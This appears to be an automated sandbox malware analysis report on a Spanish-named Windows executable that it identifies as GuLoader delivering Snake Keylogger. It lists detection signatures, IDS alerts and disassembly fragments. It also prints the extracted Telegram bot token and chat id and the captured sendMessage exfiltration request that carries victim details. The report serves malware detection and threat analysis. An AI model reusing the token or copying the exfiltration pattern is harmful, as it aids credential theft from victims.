Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CERTIFICADO TITULARIDAD.exe

Overview

General Information

Sample name:CERTIFICADO TITULARIDAD.exe
Analysis ID:1553664
MD5:597971be325bbba1df725a7c101a4c58
SHA1:90e6b7d6c632cc6fb0d5641ec9b987d5e3387397
SHA256:535d29bedc8c720ed7daaeb5e8d79c650b21664d72bad77106eb518975be223b
Tags:exenjratvipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • CERTIFICADO TITULARIDAD.exe (PID: 5036 cmdline: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe" MD5: 597971BE325BBBA1DF725A7C101A4C58)
    • CERTIFICADO TITULARIDAD.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe" MD5: 597971BE325BBBA1DF725A7C101A4C58)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.3373397485.00000000017A2000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000000.00000002.2622546717.0000000004C52000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: CERTIFICADO TITULARIDAD.exe PID: 2308JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-11T15:27:16.442385+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649774TCP
          2024-11-11T15:27:55.164712+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649982TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-11T15:28:13.593175+010028033053Unknown Traffic192.168.2.649987188.114.96.3443TCP
          2024-11-11T15:28:15.547974+010028033053Unknown Traffic192.168.2.649989188.114.96.3443TCP
          2024-11-11T15:28:21.416312+010028033053Unknown Traffic192.168.2.649998188.114.96.3443TCP
          2024-11-11T15:28:24.187990+010028033053Unknown Traffic192.168.2.650002188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-11T15:28:11.755827+010028032742Potentially Bad Traffic192.168.2.649985132.226.8.16980TCP
          2024-11-11T15:28:13.083971+010028032742Potentially Bad Traffic192.168.2.649985132.226.8.16980TCP
          2024-11-11T15:28:15.052708+010028032742Potentially Bad Traffic192.168.2.649988132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-11T15:28:04.554730+010028032702Potentially Bad Traffic192.168.2.649983142.250.186.46443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: CERTIFICADO TITULARIDAD.exeAvira: detected
          Source: 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A87A8 CryptUnprotectData,4_2_3A3A87A8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A8EF1 CryptUnprotectData,4_2_3A3A8EF1
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49986 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49983 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.6:49984 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50003 version: TLS 1.2
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_0040687E FindFirstFileW,FindClose,4_2_0040687E
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_00402910 FindFirstFileW,4_2_00402910
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C2D
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 000DF45Dh4_2_000DF2C0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 000DF45Dh4_2_000DF4AC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 000DF45Dh4_2_000DF52F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 000DFC19h4_2_000DF961
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A231E0h4_2_39A22DC8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A22C19h4_2_39A22968
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2DC51h4_2_39A2D9A8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A231E0h4_2_39A22DC2
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A231E0h4_2_39A2310E
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2D7F9h4_2_39A2D550
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2CF49h4_2_39A2CCA0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2D3A1h4_2_39A2D0F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2FAB9h4_2_39A2F810
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_39A20040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2F661h4_2_39A2F3B8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A20D0Dh4_2_39A20B30
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A21697h4_2_39A20B30
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2EDB1h4_2_39A2EB08
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2F209h4_2_39A2EF60
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2E959h4_2_39A2E6B0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2E0A9h4_2_39A2DE00
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 39A2E501h4_2_39A2E258
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A7EB5h4_2_3A3A7B78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A2A01h4_2_3A3A2758
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A9280h4_2_3A3A8FB0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A18A1h4_2_3A3A15F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A48C9h4_2_3A3A4620
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A6CC1h4_2_3A3A6A18
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AD146h4_2_3A3ACE78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A4D21h4_2_3A3A4A78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A7119h4_2_3A3A6E70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AF136h4_2_3A3AEE68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A1CF9h4_2_3A3A1A50
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A2151h4_2_3A3A1EA8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AF5C6h4_2_3A3AF2F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A5179h4_2_3A3A4ED0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A7571h4_2_3A3A72C8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A55D1h4_2_3A3A5328
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A79C9h4_2_3A3A7720
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AB5E6h4_2_3A3AB318
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AD5D6h4_2_3A3AD308
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A25A9h4_2_3A3A2300
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A2E59h4_2_3A3A2BB0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3ABA76h4_2_3A3AB7A8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3ADA66h4_2_3A3AD798
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AFA56h4_2_3A3AF788
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A5A29h4_2_3A3A5780
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A5E81h4_2_3A3A5BD8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3ABF06h4_2_3A3ABC38
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A62D9h4_2_3A3A6030
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3ADEF6h4_2_3A3ADC28
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A32B1h4_2_3A3A3008
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A3709h4_2_3A3A3460
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A02E9h4_2_3A3A0040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AE386h4_2_3A3AE0B8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A0741h4_2_3A3A0498
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A6733h4_2_3A3A6488
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then mov esp, ebp4_2_3A3AB081
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A0B99h4_2_3A3A08F0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AC396h4_2_3A3AC0C8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AC826h4_2_3A3AC558
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AE816h4_2_3A3AE548
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A0FF1h4_2_3A3A0D48
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3A1449h4_2_3A3A11A0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3ACCB6h4_2_3A3AC9E8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A3AECA6h4_2_3A3AE9D8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A415E16h4_2_3A415B48
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A416970h4_2_3A416678
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A413506h4_2_3A413238
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A416347h4_2_3A415FD8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41030Eh4_2_3A410040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A416E38h4_2_3A416B40
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A419940h4_2_3A419648
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41C448h4_2_3A41C150
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A413E26h4_2_3A413B58
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41EF50h4_2_3A41EC58
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A410C2Eh4_2_3A410960
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A418158h4_2_3A417E60
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41AC60h4_2_3A41A968
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41D768h4_2_3A41D470
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A414746h4_2_3A414478
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41E0F8h4_2_3A41DE00
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A414BD7h4_2_3A414908
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A417300h4_2_3A417008
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4119DEh4_2_3A411710
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A419E08h4_2_3A419B10
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A412BE6h4_2_3A412918
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41C910h4_2_3A41C618
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41F418h4_2_3A41F120
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4154F6h4_2_3A415228
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A418620h4_2_3A418328
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41B128h4_2_3A41AE30
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41DC30h4_2_3A41D938
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41BAB8h4_2_3A41B7C0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A413996h4_2_3A4136C8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41E5C0h4_2_3A41E2C8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41079Eh4_2_3A4104D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4177C8h4_2_3A4174D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41A2D0h4_2_3A419FD8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41CDD8h4_2_3A41CAE0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4142B6h4_2_3A413FE8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41F8E0h4_2_3A41F5E8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4110BEh4_2_3A410DF0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A418AE8h4_2_3A4187F0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A4122C6h4_2_3A411FF8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41B5F0h4_2_3A41B2F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41154Eh4_2_3A411280
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A419478h4_2_3A419180
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A412756h4_2_3A412488
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41BF80h4_2_3A41BC88
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41EA88h4_2_3A41E790
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A415066h4_2_3A414D98
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A417C90h4_2_3A417998
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A411E47h4_2_3A411BA0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41A798h4_2_3A41A4A0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A413076h4_2_3A412DA8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41D2A0h4_2_3A41CFA8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A41FDA8h4_2_3A41FAB0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A415986h4_2_3A4156B8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A418FB0h4_2_3A418CB8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A441FE8h4_2_3A441CF0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A440338h4_2_3A440040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A441B20h4_2_3A441828
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A441190h4_2_3A440E98
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A441658h4_2_3A441360
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A440801h4_2_3A440508
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then jmp 3A440CC8h4_2_3A4409D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A483E70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A483E60
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A480A10
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A4809EA
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A480D26

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2011/11/2024%20/%2023:31:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49988 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49985 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49774
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50002 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49987 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49998 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49989 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49982
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49983 -> 142.250.186.46:443
